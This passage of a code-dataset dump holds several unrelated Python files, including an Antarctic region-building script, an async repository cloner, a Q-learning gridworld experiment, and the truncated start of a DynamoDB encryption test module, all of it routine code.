+lat_0=-90 +lat_ts=-71 +lon_0=0 +k=1 \" \\\n \"+x_0=0 +y_0=0 +datum=WGS84 +units=m +no_defs\"\n ds.attrs['proj4'] = \"+init=epsg:3031\"\n\n # Antarctic stereographic\n inProj = pyproj.Proj(init='epsg:3031')\n # lon/lat\n outProj = pyproj.Proj(init='epsg:4326')\n X, Y = numpy.meshgrid(x, y)\n Lon, Lat = pyproj.transform(inProj, outProj, X, Y)\n\n ds['lon'] = (('y', 'x'), Lon)\n ds.lon.attrs['units'] = 'degrees east'\n ds['lat'] = (('y', 'x'), Lat)\n ds.lat.attrs['units'] = 'degrees north'\n\n # add Bedmap2 data\n for fieldName in fields:\n fileName = 'bedmap2/bedmap2_bin/bedmap2_{}.flt'.format(fieldName)\n with open(fileName, 'r') as f:\n field = numpy.fromfile(f, dtype=numpy.float32).reshape(6667, 6667)\n # flip the y axis\n field = field[::-1, :]\n # switch invalid values to be NaN (as expected by xarray)\n field[field == -9999.] 
= numpy.nan\n if fieldName == 'rockmask':\n # rock mask is zero where rock and -9999 (now NaN) elsewhere\n field = numpy.array(numpy.isfinite(field), numpy.float32)\n if fieldName == 'icemask_grounded_and_shelves':\n # split into separate grounded and floating masks\n ds['icemask_grounded'] = \\\n (('y', 'x'), numpy.array(field == 0, numpy.float32))\n ds['icemask_shelves'] = \\\n (('y', 'x'), numpy.array(field == 1, numpy.float32))\n ds['open_ocean_mask'] = \\\n (('y', 'x'), numpy.array(numpy.isnan(field), numpy.float32))\n else:\n ds[fieldName] = (('y', 'x'), field)\n\n ds.to_netcdf(outFileName)\n print(' Done.')\n\n\ndef get_longest_contour(contourValue, author):\n\n def stereo_to_lon_lat(x, y):\n return pyproj.transform(inProj, outProj, x, y)\n\n ds = xarray.open_dataset('bedmap2.nc')\n\n # plot contours\n plt.figure()\n cs = plt.contour(ds.x.values, ds.y.values, ds.bed, (contourValue,))\n paths = cs.collections[0].get_paths()\n\n pathLengths = [len(paths[i]) for i in range(len(paths))]\n iLongest = numpy.argmax(pathLengths)\n\n p = paths[iLongest]\n v = p.vertices\n x = v[:, 0]\n y = v[:, 1]\n\n # Antarctic stereographic\n inProj = pyproj.Proj(init='epsg:3031')\n # lon/lat\n outProj = pyproj.Proj(init='epsg:4326')\n\n poly = shapely.geometry.Polygon([(i[0], i[1]) for i in zip(x, y)])\n\n epsilon = 1e-14\n minY = numpy.amin(y)\n wedge = shapely.geometry.Polygon([(epsilon, minY),\n (epsilon**2, -epsilon),\n (0, epsilon),\n (-epsilon**2, -epsilon),\n (-epsilon, minY),\n (epsilon, minY)])\n\n difference = poly.difference(wedge)\n\n difference = shapely.ops.transform(stereo_to_lon_lat, difference)\n\n fc = FeatureCollection()\n\n geometry = shapely.geometry.mapping(difference)\n # get rid of the wedge again by rounding the coordinates\n geometry['coordinates'] = _round_coords(geometry['coordinates'])\n\n fc.add_feature(\n {\"type\": \"Feature\",\n \"properties\": {\"name\": \"Contour {}\".format(contourValue),\n \"author\": author,\n \"object\": 'region',\n \"component\": 'ocean'},\n \"geometry\": geometry})\n\n return fc\n\n\ndef make_polygon(lons, lats, name, author, tags):\n fc = FeatureCollection()\n\n coords = list()\n for index in range(len(lons)):\n coords.append([lons[index], lats[index]])\n coords.append([lons[0], lats[0]])\n\n fc.add_feature(\n {\"type\": \"Feature\",\n \"properties\": {\"name\": name,\n \"author\": author,\n \"object\": 'region',\n \"component\": 'ocean',\n \"tags\": tags,\n \"zmin\": -1500.,\n \"zmax\": -200.},\n \"geometry\": {\n \"type\": \"Polygon\",\n \"coordinates\": [coords]}})\n return fc\n\n\ndef shelf_polygon(lons, lats, name, author, tags, fcContour):\n fc = make_polygon(lons, lats, name, author, tags)\n\n lons = [-180., -180., 180., 180.]\n lats = [-90., 90., 90., -90.]\n fc_world = make_polygon(lons, lats, name, author, tags)\n\n fcContour = fc_world.difference(fcContour)\n\n fcShelf = fc.difference(fcContour)\n\n props = fcShelf.features[0]['properties']\n props['name'] = props['name'] + ' Shelf'\n props['tags'] = props['tags'] + ';Shelf'\n props['zmin'] = -1500.\n props['zmax'] = -200.\n\n return fcShelf\n\n\ndef main():\n author = 'Xylar Asay-Davis, Alice Barthel, Nicolas Jourdain'\n tags = 'Antarctic;ISMIP6'\n\n # make a geometric features object that knows about the geometric data\n # cache up a couple of directories\n gf = GeometricFeatures('../../geometric_data')\n\n bedmap2_bin_to_netcdf('bedmap2.nc')\n\n fcContour1500 = get_longest_contour(contourValue=-1500., author=author)\n\n fc = FeatureCollection()\n\n lons = [-65., -25., -25., -65.]\n 
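# The lons/lats pairs in this function list polygon corner coordinates (degrees east, degrees\n    # north); shelf_polygon then clips each box to the continental shelf using the -1500 m contour.\n    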
lats = [-80., -80., -77., -71.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Weddell Sea', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [-128., -128., -90., -90.]\n lats = [-76., -69., -69., -76.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Amundsen Sea', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [45., 45., 90., 90.]\n lats = [-70., -60., -60., -70.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Amery Sector', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [-22.5, -22.5, 22.5, 22.5]\n lats = [-75., -65., -65., -75.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Dronning Maud Land', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [110., 110., 130., 130.]\n lats = [-70., -60., -60., -70.]\n fc.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Totten Region', author=author, tags=tags,\n fcContour=fcContour1500))\n\n lons = [165., 165., 180., 180.]\n lats = [-80., -71., -73., -80.]\n fc_ross = shelf_polygon(\n lons, lats, name='ISMIP6 Western Ross Sea', author=author, tags=tags,\n fcContour=fcContour1500)\n\n lons = [-180., -180., -150., -150.]\n lats = [-80., -73., -77., -80.]\n fc_ross.merge(shelf_polygon(\n lons, lats, name='ISMIP6 Eastern Ross Sea', author=author, tags=tags,\n fcContour=fcContour1500))\n\n old_props = fc_ross.features[0]['properties']\n fc_ross = fc_ross.combine('ISMIP6 Ross Sea')\n props = fc_ross.features[0]['properties']\n for prop in ['tags', 'zmin', 'zmax']:\n props[prop] = old_props[prop]\n\n fc.merge(fc_ross)\n\n fc.plot(projection='southpole')\n fc.to_geojson('ismip6_antarctic_ocean_regions.geojson')\n\n # \"split\" these features into individual files in the geometric data cache\n gf.split(fc)\n\n # update the database of feature names and tags\n write_feature_names_and_tags(gf.cacheLocation)\n # move the resulting file into place\n shutil.copyfile('features_and_tags.json',\n '../../geometric_features/features_and_tags.json')\n\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MPAS-Dev/geometric_features","sub_path":"feature_creation_scripts/ismip6_antarctic_ocean_regions/ismip6_antarctic_ocean_regions.py","file_name":"ismip6_antarctic_ocean_regions.py","file_ext":"py","file_size_in_byte":9224,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"72"} +{"seq_id":"4072538165","text":"import asyncio\nimport git\nimport hashlib\nimport os\n\n\nasync def clone_rep(repo_url, destination, loop):\n print(f'START LOADING {repo_url}')\n try:\n await loop.run_in_executor(\n None, git.Repo.clone_from, repo_url, destination)\n print(f'FINISH LOADING {repo_url}')\n return True\n except Exception as e:\n print(f'Failed to load {repo_url}. 
Reason: {e}')\n        return False\n\n\ndef dir_hash(directory, verbose=0):\n    sha_hash = hashlib.sha256()\n    if not os.path.exists(directory):\n        return -1\n\n    try:\n        for root, dirs, files in os.walk(directory):\n            for names in sorted(files):\n                filepath = os.path.join(root, names)\n                if verbose == 1:\n                    print(f'Hashing {filepath}')\n                try:\n                    f1 = open(filepath, 'rb')\n                except Exception as e:\n                    # You can't open the file for some reason;\n                    # f1 was never opened here, so there is nothing to close\n                    print(e)\n                    continue\n\n                while 1:\n                    # Read file in as little chunks\n                    buf = f1.read(4096)\n                    if not buf:\n                        break\n                    h = hashlib.sha256(buf)\n                    d = h.hexdigest().encode('utf-8')\n                    sha_hash.update(d)\n                print(sha_hash.hexdigest())\n                f1.close()\n\n    except Exception as e:\n        print(e)\n        return -2\n    res = sha_hash.hexdigest()\n    print(res)\n    return res\n\n\nasync def clone_all(root):\n    repo_url = \"https://gitea.radium.group/radium/project-configuration\"\n    loop = asyncio.get_running_loop()  # inside a coroutine the loop is already running\n    res = await asyncio.gather(\n        clone_rep(repo_url, os.path.join(root, \"1\"), loop),\n        clone_rep(repo_url, os.path.join(root, \"2\"), loop),\n        clone_rep(repo_url, os.path.join(root, \"3\"), loop)\n    )\n    hashes = []\n    if res[0]:\n        hashes.append(dir_hash(os.path.join(root, \"1\"), 1))\n    if res[1]:\n        hashes.append(dir_hash(os.path.join(root, \"2\"), 1))\n    if res[2]:\n        hashes.append(dir_hash(os.path.join(root, \"3\"), 1))\n\n    return hashes\n\nif __name__ == \"__main__\":\n    asyncio.run(clone_all(\"data\"))\n","repo_name":"Naaadya/async_test","sub_path":"async_load.py","file_name":"async_load.py","file_ext":"py","file_size_in_byte":2229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"32201728289","text":"import csv\nimport numpy as np\n\ndef loadFile(filename):\n    records = []\n    with open(filename, 'r', newline='') as file:\n        reader = csv.reader(file)\n        for row in reader:\n            records.append(np.array(row).astype(float))\n    return np.array(records)","repo_name":"mtmmy/kmeans_and_GMM","sub_path":"loadCSV.py","file_name":"loadCSV.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"14169926699","text":"\"\"\"\nTest utils.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nfrom django.urls import reverse\nfrom django.core.management import call_command\n\nimport pytest\n\nfrom rest_framework import status\n\nfrom .base import BaseRestFrameworkTestCase\n\n__title__ = 'django_elasticsearch_dsl_drf.tests.test_utils'\n__author__ = 'Artur Barseghyan '\n__copyright__ = '2017-2020 Artur Barseghyan'\n__license__ = 'GPL 2.0/LGPL 2.1'\n__all__ = (\n    'TestUtils',\n)\n\n\n@pytest.mark.django_db\nclass TestUtils(BaseRestFrameworkTestCase):\n    \"\"\"Test utils.\"\"\"\n\n    pytestmark = pytest.mark.django_db\n\n    @classmethod\n    def setUpClass(cls):\n        super(TestUtils, cls).setUpClass()\n\n        cls.sleep()\n        call_command('search_index', '--rebuild', '-f')\n\n    def _list_results(self):\n        \"\"\"List results.\"\"\"\n        self.authenticate()\n\n        url = reverse('bookdocument_no_records-list', kwargs={})\n\n        # Make request\n        response = self.client.get(url, {})\n        self.assertEqual(\n            response.status_code,\n            status.HTTP_200_OK\n        )\n\n        # Should contain no results\n        self.assertEqual(response.data['results'], [])\n        self.assertEqual(response.data['count'], 0)\n        self.assertEqual(response.data['next'], None)\n        self.assertEqual(response.data['previous'], None)\n\n    def test_list_results(self):\n        \"\"\"Test list results.\"\"\"\n        return self._list_results()\n\n\nif 
__name__ == '__main__':\n unittest.main()\n","repo_name":"barseghyanartur/django-elasticsearch-dsl-drf","sub_path":"src/django_elasticsearch_dsl_drf/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"72"} +{"seq_id":"1151375621","text":"from KgeN.tir.ir.visitor import CollectVisitor\n\n\nclass AccessEntry:\n READ=0\n WRITE=1\n def __init__(self, type, tensor, nest_loop):\n self.type = type\n self.tensor = tensor\n self.nest_loop = nest_loop\n\nclass SyncAnalysisVisitor(CollectVisitor):\n def __init__(self):\n super().__init__()\n self.access_list = []\n self.nest_loop = []\n self.m = {\n AccessEntry.READ: {},\n AccessEntry.WRITE: {}\n }\n \n def analysis(self, func):\n func.accept(self)\n return func\n \n def visit_func_stmt(self, stmt):\n for st in stmt.body:\n st.accept(self)\n\n for entry in self.access_list:\n if entry.tensor in self.m[1 - entry.type]:\n # write before\n loop, has_same_loop = find_sync_loop(entry.nest_loop, self.m[1 - entry.type][entry.tensor].nest_loop)\n if has_same_loop:\n loop.need_sync_before = True\n loop.need_sync_after = True\n else:\n loop.need_sync_before = True\n self.m[entry.type][entry.tensor] = entry\n \n def visit_for_stmt(self, stmt):\n self.nest_loop.append(stmt)\n for st in stmt.body:\n st.accept(self)\n self.nest_loop.pop()\n \n def visit_assign_stmt(self, stmt):\n tensor = stmt.dest.tensor\n for inp in tensor.op.inputs:\n if inp.scope == \"shared\":\n self.access_list.append(AccessEntry(AccessEntry.READ, inp, tuple(self.nest_loop)))\n if tensor.scope == \"shared\":\n self.access_list.append(AccessEntry(AccessEntry.WRITE, tensor, tuple(self.nest_loop)))\n\ndef find_sync_loop(loop_a, loop_b):\n has_same_loop = False\n for i, j in zip(loop_a, loop_b):\n if i is not j:\n return i, has_same_loop\n else:\n has_same_loop = True\n return None, has_same_loop\n\ndef sync_analysis_pass(func):\n visitor = SyncAnalysisVisitor()\n func = visitor.analysis(func)\n return func","repo_name":"Cjkkkk/KgeN","sub_path":"KgeN/tir/transform/sync_analysis.py","file_name":"sync_analysis.py","file_ext":"py","file_size_in_byte":2064,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"29126778435","text":"import findspark\r\nfindspark.init()\r\n\r\nfrom pyspark.sql import SparkSession\r\nfrom openpyxl.utils import get_column_letter\r\nfrom pandas import ExcelWriter\r\nimport os\r\n\r\n\r\n# https://stackoverflow.com/a/66599619\r\ndef auto_format_cell_width(ws):\r\n for letter in range(1, ws.max_column):\r\n maximum_value = 0\r\n for cell in ws[get_column_letter(letter)]:\r\n val_to_check = len(str(cell.value))\r\n if val_to_check > maximum_value:\r\n maximum_value = val_to_check\r\n ws.column_dimensions[get_column_letter(letter)].width = maximum_value + 2\r\n\r\n\r\nspark = SparkSession.builder.appName(\"Spark_Pandas_Excel\") \\\r\n .getOrCreate()\r\nspark.sparkContext.setLogLevel(\"ERROR\")\r\n\r\ninputfilelist = [\"C:\\\\Users\\\\Vicky\\\\Minnie\\\\homes.csv\", \"C:\\\\Users\\\\Vicky\\\\Minnie\\\\sample_data.csv\"]\r\noutputfile = \"C:\\\\Users\\\\Vicky\\\\Desktop\\\\output.xlsx\"\r\n\r\nfirst_time_file_flag = True\r\nfor inputfile in inputfilelist:\r\n sparkDF = spark.read.options(header='true', inferSchema='true').csv(inputfile)\r\n sheet_name = os.path.splitext(os.path.basename(inputfile))[0]\r\n if first_time_file_flag:\r\n excel = ExcelWriter(outputfile, engine='openpyxl', 
mode='w')\r\n        first_time_file_flag = False\r\n    else:\r\n        excel = ExcelWriter(outputfile, engine='openpyxl', mode='a')\r\n    sparkDF.toPandas().to_excel(excel, sheet_name=sheet_name, index=False, startrow=2)\r\n    workbook = excel.book\r\n    worksheet = workbook[sheet_name]\r\n    worksheet.cell(column=1, row=1, value=sheet_name + \" file data:\")\r\n    auto_format_cell_width(worksheet)\r\n    excel.save()\r\n    print(\"Done: \" + inputfile)\r\n\r\nspark.stop()\r\n","repo_name":"soumasish-das/python","sub_path":"spark_pandas_excel.py","file_name":"spark_pandas_excel.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"8933354717","text":"# https://binarysearch.io/question/309\n\nclass Solution:\n    def solve(self, G):\n        time = 0\n        visited = set()\n        entry_time = {}\n        min_time = {}\n        res = 0\n\n        def dfs(v, par=None):\n            nonlocal time, res\n            visited.add(v)\n            entry_time[v] = time\n            min_time[v] = time\n            time += 1\n            for to in G[v]:\n                if to == par: continue\n                if to in visited:\n                    min_time[v] = min(min_time[v], entry_time[to])\n                else:\n                    dfs(to, v)\n                    min_time[v] = min(min_time[v], min_time[to])\n                    if min_time[to] > entry_time[v]:\n                        res += 1\n\n        for i in range(len(G)):\n            if i not in visited:\n                dfs(i)\n\n        return res\n\n\ns = Solution()\ngraph = [[1, 2, 3], [0, 5], [0, 3], [0, 2, 4], [3], [1]]\nassert s.solve(graph) == 3","repo_name":"sashaaero/binarysearch-problems","sub_path":"problems/harder/london_bridge.py","file_name":"london_bridge.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"}
+{"seq_id":"9387338041","text":"from classes import ParseData\nimport csv\nimport sys\n\n\ndef Main():\n    count = 0\n    while True:  # run until the user chooses (4), which calls sys.exit()\n\n        UserAnswer = input(\n            \"\\nWould you like to? : \\n(1): Display Current Data.\\n(2): Create New User \\n(3): Analyze Data \\n(4): Exit. \\n\")\n        Data = ParseData.readData();\n\n        if (UserAnswer == \"1\"):\n\n            # READS IN DATA FROM CSV INTO NESTED ARRAY/LIST\n            # print('');\n            # print('READS IN DATA FROM CSV INTO NESTED ARRAY/LIST');\n            Data = ParseData.readData();\n\n            # DISPLAYS NESTED LIST\n            # print('');\n            # print('DISPLAYS NESTED LIST');\n            ParseData.showData(Data);\n        elif (UserAnswer == \"2\"):\n            count = len(Data) + 1;\n            #count = count + 1\n            createData = ParseData.createData(Data, count);\n\n        elif (UserAnswer == \"3\"):\n            ParseData.analyzeData(Data);\n\n        elif (UserAnswer == \"4\"):\n            sys.exit();\n\n        else:\n            print(\"TRY AGAIN .. 
DUMMY \n");\n\n\nMain();\n","repo_name":"brianramaswami/Zag-Friend-Finder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"9893283997","text":"# %%\nimport gym\nimport itertools\nimport matplotlib\nimport matplotlib.style\nimport numpy as np\nimport pandas as pd\nimport sys\n\n\nfrom collections import defaultdict\n\nmatplotlib.style.use(\"ggplot\")\n# %% Windy thing\nimport gym\nimport numpy as np\nimport sys\nfrom io import StringIO  # used by _render when mode == \"ansi\"\nfrom gym.envs.toy_text import discrete\n\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\n\n\nclass WindyGridworldEnv(discrete.DiscreteEnv):\n\n    metadata = {\"render.modes\": [\"human\", \"ansi\"]}\n\n    def _limit_coordinates(self, coord):\n        coord[0] = min(coord[0], self.shape[0] - 1)\n        coord[0] = max(coord[0], 0)\n        coord[1] = min(coord[1], self.shape[1] - 1)\n        coord[1] = max(coord[1], 0)\n        return coord\n\n    def _calculate_transition_prob(self, current, delta, winds):\n        new_position = (\n            np.array(current)\n            + np.array(delta)\n            + np.array([-1, 0]) * winds[tuple(current)]\n        )\n        new_position = self._limit_coordinates(new_position).astype(int)\n        new_state = np.ravel_multi_index(tuple(new_position), self.shape)\n        is_done = tuple(new_position) == (3, 7)\n        return [(1.0, new_state, -1.0, is_done)]\n\n    def __init__(self):\n        self.shape = (7, 10)\n\n        nS = np.prod(self.shape) # number of squares\n        nA = 4 # Number of potential actions\n\n        # Wind strength\n        winds = np.zeros(self.shape)\n        winds[:, [3, 4, 5, 8]] = 1\n        winds[:, [6, 7]] = 2\n        print(winds)\n\n        # Calculate transition probabilities\n        P = {}\n        for s in range(nS):\n            position = np.unravel_index(s, self.shape)\n            P[s] = {a: [] for a in range(nA)}\n            P[s][UP] = self._calculate_transition_prob(position, [-1, 0], winds)\n            P[s][RIGHT] = self._calculate_transition_prob(position, [0, 1], winds)\n            P[s][DOWN] = self._calculate_transition_prob(position, [1, 0], winds)\n            P[s][LEFT] = self._calculate_transition_prob(position, [0, -1], winds)\n\n        # We always start in state (3, 0)\n        isd = np.zeros(nS)\n        isd[np.ravel_multi_index((3, 0), self.shape)] = 1.0\n\n        super(WindyGridworldEnv, self).__init__(nS, nA, P, isd)\n\n    def render(self, mode=\"human\", close=False):\n        self._render(mode, close)\n\n    def _render(self, mode=\"human\", close=False):\n        if close:\n            return\n\n        outfile = StringIO() if mode == \"ansi\" else sys.stdout\n\n        for s in range(self.nS):\n            position = np.unravel_index(s, self.shape)\n            # print(self.s)\n            if self.s == s:\n                output = \" x \"\n            elif position == (3, 7):\n                output = \" T \"\n            else:\n                output = \" o \"\n\n            if position[1] == 0:\n                output = output.lstrip()\n            if position[1] == self.shape[1] - 1:\n                output = output.rstrip()\n                output += \"\\n\"\n\n            outfile.write(output)\n        outfile.write(\"\\n\")\n\n\n# %% Plotting thing\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nfrom collections import namedtuple\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nEpisodeStats = namedtuple(\"Stats\", [\"episode_lengths\", \"episode_rewards\"])\n\n\ndef plot_cost_to_go_mountain_car(env, estimator, num_tiles=20):\n    x = np.linspace(\n        env.observation_space.low[0], env.observation_space.high[0], num=num_tiles\n    )\n    y = np.linspace(\n        env.observation_space.low[1], env.observation_space.high[1], num=num_tiles\n    )\n    X, Y = np.meshgrid(x, y)\n    Z = np.apply_along_axis(\n        lambda _: -np.max(estimator.predict(_)), 2, np.dstack([X, Y])\n    )\n\n    fig = plt.figure(figsize=(10, 5))\n    ax = 
fig.add_subplot(111, projection=\"3d\")\n surf = ax.plot_surface(\n X, Y, Z, rstride=1, cstride=1, cmap=matplotlib.cm.coolwarm, vmin=-1.0, vmax=1.0\n )\n ax.set_xlabel(\"Position\")\n ax.set_ylabel(\"Velocity\")\n ax.set_zlabel(\"Value\")\n ax.set_title('Mountain \"Cost To Go\" Function')\n fig.colorbar(surf)\n plt.show()\n\n\ndef plot_value_function(V, title=\"Value Function\"):\n \"\"\"\n Plots the value function as a surface plot.\n \"\"\"\n min_x = min(k[0] for k in V.keys())\n max_x = max(k[0] for k in V.keys())\n min_y = min(k[1] for k in V.keys())\n max_y = max(k[1] for k in V.keys())\n\n x_range = np.arange(min_x, max_x + 1)\n y_range = np.arange(min_y, max_y + 1)\n X, Y = np.meshgrid(x_range, y_range)\n\n # Find value for all (x, y) coordinates\n Z_noace = np.apply_along_axis(\n lambda _: V[(_[0], _[1], False)], 2, np.dstack([X, Y])\n )\n Z_ace = np.apply_along_axis(lambda _: V[(_[0], _[1], True)], 2, np.dstack([X, Y]))\n\n def plot_surface(X, Y, Z, title):\n fig = plt.figure(figsize=(20, 10))\n ax = fig.add_subplot(111, projection=\"3d\")\n surf = ax.plot_surface(\n X,\n Y,\n Z,\n rstride=1,\n cstride=1,\n cmap=matplotlib.cm.coolwarm,\n vmin=-1.0,\n vmax=1.0,\n )\n ax.set_xlabel(\"Player Sum\")\n ax.set_ylabel(\"Dealer Showing\")\n ax.set_zlabel(\"Value\")\n ax.set_title(title)\n ax.view_init(ax.elev, -120)\n fig.colorbar(surf)\n plt.show()\n\n plot_surface(X, Y, Z_noace, \"{} (No Usable Ace)\".format(title))\n plot_surface(X, Y, Z_ace, \"{} (Usable Ace)\".format(title))\n\n\ndef plot_episode_stats(stats, smoothing_window=10, noshow=False):\n # Plot the episode length over time\n fig1 = plt.figure(figsize=(10, 5))\n plt.plot(stats.episode_lengths)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Episode Length\")\n plt.title(\"Episode Length over Time\")\n if noshow:\n plt.close(fig1)\n else:\n plt.show(fig1)\n\n # Plot the episode reward over time\n fig2 = plt.figure(figsize=(10, 5))\n rewards_smoothed = (\n pd.Series(stats.episode_rewards)\n .rolling(smoothing_window, min_periods=smoothing_window)\n .mean()\n )\n plt.plot(rewards_smoothed)\n plt.xlabel(\"Episode\")\n plt.ylabel(\"Episode Reward (Smoothed)\")\n plt.title(\n \"Episode Reward over Time (Smoothed over window size {})\".format(\n smoothing_window\n )\n )\n if noshow:\n plt.close(fig2)\n else:\n plt.show(fig2)\n\n # Plot time steps and episode number\n fig3 = plt.figure(figsize=(10, 5))\n plt.plot(np.cumsum(stats.episode_lengths), np.arange(len(stats.episode_lengths)))\n plt.xlabel(\"Time Steps\")\n plt.ylabel(\"Episode\")\n plt.title(\"Episode per time step\")\n if noshow:\n plt.close(fig3)\n else:\n plt.show(fig3)\n\n return fig1, fig2, fig3\n\n\n# %% Create environment\nenv = WindyGridworldEnv()\n# %%\ndef createEpsilonGreedyPolicy(Q, epsilon, num_actions):\n \"\"\"\n Creates an epsilon-greedy policy based\n on a given Q-function and epsilon.\n\n Returns a function that takes the state\n as an input and returns the probabilities\n for each action in the form of a numpy array\n of length of the action space(set of possible actions).\n \"\"\"\n\n def policyFunction(state):\n\n Action_probabilities = np.ones(num_actions, dtype=float) * epsilon / num_actions\n\n best_action = np.argmax(Q[state])\n Action_probabilities[best_action] += 1.0 - epsilon\n return Action_probabilities\n\n return policyFunction\n\n\n# %%\ndef qLearning(env, num_episodes, discount_factor=1.0, alpha=0.6, epsilon=0.1):\n \"\"\"\n Q-Learning algorithm: Off-policy TD control.\n Finds the optimal greedy policy while improving\n following an epsilon-greedy 
policy\"\"\"\n\n # Action value function\n # A nested dictionary that maps\n # state -> (action -> action-value).\n Q = defaultdict(lambda: np.zeros(env.action_space.n))\n\n # Keeps track of useful statistics\n stats = EpisodeStats(\n episode_lengths=np.zeros(num_episodes), episode_rewards=np.zeros(num_episodes)\n )\n\n # Create an epsilon greedy policy function\n # appropriately for environment action space\n policy = createEpsilonGreedyPolicy(Q, epsilon, env.action_space.n)\n\n # For every episode\n for ith_episode in range(num_episodes):\n\n # Reset the environment and pick the first action\n state = env.reset()\n\n for t in itertools.count():\n\n # get probabilities of all actions from current state\n action_probabilities = policy(state)\n\n # choose action according to\n # the probability distribution\n action = np.random.choice(\n np.arange(len(action_probabilities)), p=action_probabilities\n )\n # print(f\"action: {action}\")\n\n # take action and get reward, transit to next state\n next_state, reward, done, _ = env.step(action)\n # env._render()\n # print(f\"Next: {next_state}; reward: {reward}; done: {done}\")\n\n # Update statistics\n stats.episode_rewards[ith_episode] += reward\n stats.episode_lengths[ith_episode] = t\n\n # TD Update\n best_next_action = np.argmax(Q[next_state])\n td_target = reward + discount_factor * Q[next_state][best_next_action]\n td_delta = td_target - Q[state][action]\n Q[state][action] += alpha * td_delta\n\n # done is True if episode terminated\n if done:\n break\n\n state = next_state\n\n return Q, stats\n\n\n# %%\nQ, stats = qLearning(env, 100000)\n# %%\nplot_episode_stats(stats)\n\n# %% Best path\n# while True:\nwinds = np.zeros((7, 10))\nwinds[:, [3, 4, 5, 8]] = 1\nwinds[:, [6, 7]] = 2\n\nsquare = (3, 0)\n\nwhile square != (3, 7):\n idx = int(f\"{square[0]}{square[1]}\")\n bestDir = [\"up\", \"right\", \"down\", \"left\"][np.argmax(Q[idx])]\n print(f\"From square {square} best dir is {bestDir}\")\n\n bestStep = [(-1, 0), (0, 1), (1, 0), (0, -1)][np.argmax(Q[idx])]\n square = (\n max(square[0] + bestStep[0] - int(winds[square[0], square[1]]), 0),\n max(square[1] + bestStep[1], 0),\n )\n\n\n# %%\n","repo_name":"ryanofarrell/public","sub_path":"projects/chess/code/rlConcepts.py","file_name":"rlConcepts.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14404564544","text":"from __future__ import division\n\nimport base64\nimport copy\nimport itertools\nimport os\nfrom collections import defaultdict\nfrom decimal import Decimal\n\nimport boto3\nimport pytest\nfrom boto3.dynamodb.types import Binary\nfrom botocore.exceptions import NoRegionError\nfrom mock import patch\nfrom moto import mock_dynamodb2\n\nfrom dynamodb_encryption_sdk.delegated_keys.jce import JceNameLocalDelegatedKey\nfrom dynamodb_encryption_sdk.encrypted.client import EncryptedClient\nfrom dynamodb_encryption_sdk.encrypted.item import decrypt_python_item, encrypt_python_item\nfrom dynamodb_encryption_sdk.encrypted.resource import EncryptedResource\nfrom dynamodb_encryption_sdk.encrypted.table import EncryptedTable\nfrom dynamodb_encryption_sdk.identifiers import CryptoAction\nfrom dynamodb_encryption_sdk.internal.identifiers import ReservedAttributes\nfrom dynamodb_encryption_sdk.material_providers import CryptographicMaterialsProvider\nfrom dynamodb_encryption_sdk.material_providers.most_recent import CachingMostRecentProvider\nfrom dynamodb_encryption_sdk.material_providers.static 
import StaticCryptographicMaterialsProvider\nfrom dynamodb_encryption_sdk.material_providers.store.meta import MetaStore\nfrom dynamodb_encryption_sdk.material_providers.wrapped import WrappedCryptographicMaterialsProvider\nfrom dynamodb_encryption_sdk.materials import CryptographicMaterials\nfrom dynamodb_encryption_sdk.materials.raw import RawDecryptionMaterials, RawEncryptionMaterials\nfrom dynamodb_encryption_sdk.structures import AttributeActions, EncryptionContext\nfrom dynamodb_encryption_sdk.transform import ddb_to_dict, dict_to_ddb\n\nRUNNING_IN_TRAVIS = \"TRAVIS\" in os.environ\n_DELEGATED_KEY_CACHE = defaultdict(lambda: defaultdict(dict))\nTEST_TABLE_NAME = \"my_table\"\nTEST_REGION_NAME = \"us-west-2\"\nTEST_INDEX = {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"99.233\")},\n}\nSECONDARY_INDEX = {\n \"secondary_index_1\": {\"type\": \"B\", \"value\": Binary(b\"\\x00\\x01\\x02\")},\n \"secondary_index_2\": {\"type\": \"S\", \"value\": \"another_value\"},\n}\nTEST_KEY = {name: value[\"value\"] for name, value in TEST_INDEX.items()}\nTEST_BATCH_INDEXES = [\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", \"value\": Decimal(\"99.233\")},\n },\n {\n \"partition_attribute\": {\"type\": \"S\", \"value\": \"test_value\"},\n \"sort_attribute\": {\"type\": \"N\", 